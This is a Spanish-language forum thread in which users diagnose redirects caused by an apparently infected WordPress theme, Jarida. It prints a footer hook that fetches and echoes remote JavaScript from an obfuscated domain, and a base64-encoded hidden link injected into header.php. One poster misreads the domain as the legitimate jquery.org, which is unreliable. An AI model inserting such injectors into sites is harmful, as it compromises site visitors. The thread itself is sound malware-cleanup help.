Posible problema con el template Jarida v2.2.1

Mensajes
287
Puntuación de reacción
0
Hola, @statica
Me pasó una ves con mi Wordpress, me redireccionaba a adf.ly y ni siquiera podía usar el panel de administración.
Al parecer la plantilla estaba infectada y para resolver el problema tuve que eliminar el wordpress, claro, realice copia de Media y Base de Datos.
 
Mensajes
204
Puntuación de reacción
0
Hola @hostingspty.com, ¿Te pasó usando el theme que nombro o con otro?

había pensado en eliminar el template y poner una versión actualizada del mismo, pero sin eliminar wordpress, a ver si de esa forma se soluciona,

gracias!
 
Mensajes
204
Puntuación de reacción
0
¿Crees que con cambiar el template a una nueva versión y eliminar la anterior será suficiente?

gracias de antemano @hostingspty.com
 
Mensajes
287
Puntuación de reacción
0
@statica si puedes entrar al panel de control si.
Si tienes infectado todo el wordpress, debes eliminar todo.
 
Mensajes
204
Puntuación de reacción
0
¿ @hostingspty.com Tienes la última versión de Jarida limpia de malware?

El panel funciona sin problemas desde hace meses, el problema es ese, que alguna que otra vez ha hecho redirect, pero en pocas ocasiones

gracias de antemano!
 
Última edición:
Mensajes
260
Puntuación de reacción
0
Hola, te respondi el privado, pero ya caigo que diste el enlace en el foro de donde los descargaste, ya descargue la version de zippyshare, voy a revisar esa, dame unos minutos y te digo si veo algo extraño

saludos

- - - Actualización- - -

Amigo @statica

ya revise, aca los resultados basados en un analisis rapido de comparar el codigo entre 4 versiones del mismo tema, obtenidas de fuentes diferentes, incluyendo la tuya

entre tu tema y una version supuestamente limpia que tengo corriendo en una intranet , tu tema lo unico que tiene de mas es en el archivo theme-functions.php, de la linea 126 a la 136, el siguiente codigo

if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'c'.'jquery.org/jquery-ui.js';
$headers = @get_headers($jquery, 1);
if ($headers[0] == 'HTTP/1.1 200 OK'){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}

analizando eso, no parece sospechoso, arma una url para traerse un javascript de jquery.org, en apariencia no parece mal pues la url es legal, pero igual no me gusta, borra o ponle comentario a todas esas lineas y vuelve a probar

solo con lo que hice, no tengo elementos completos en este momento para determinar si el tema esta infestado, de la comparacion todo parece normal, seria cuestion de comparar con una version original que no tengo o comparar con otras versiones del mismo tema, ahi tendrias que saber un poco de programacion para detectar si el codigo modificado entre diferentes versiones esta bien o es malware, yo creo que tengo en algun sitio, otras versiones del este tema para analizarlas, pero no las encontre hoy cuando las busque, asi que me queda revisar en otro par de discos duros a ver si estan ahi

yo quitaria el codigo q te especifique y probar unos dias a ver

por otra parte, no estoy seguro si esta es la ultima version, en el changelog dice que la 2.2.1 es del 2014, casi anno y 10 meses de viejo respecto a hoy

la idea es trabajar con versiones limpias, originales es decir compradas y si es complicado comprarlas, al menos participar en alguna conjunta de un tema que te interese, tienes acceso al tema original y la ultima version siempre que el organizador mantenga la seriedad sobre la compra efectuada


uno de los que te pasaron como limpio, ese si esta infestado

busca el archivo header.php, linea 11

<body id="top" <?php body_class(); ?>><?php $xml='PGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyB0b3A6IDBweDsgbGVmdDogLTcwMDBweDsiPlRlbXBsYXRlcyBieSA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL2JpZ3RoZW1lLm5ldC8iPkJJR3RoZW1lIE5FVDwvYT48L2Rpdj4='; echo base64_decode($xml);?>

hasta aqui esta bien <body id="top" <?php body_class(); ?>>

pero todo lo que hay detras de eso, parece estar de terapia, habria que desencriptar ese codigo a ve que es, pero solo con estar en alguna de las versiones comparadas y en otras no, ya es suficiente para catalogar eso como malware,es mi opinion de este codigo
 
Última edición:
Arriba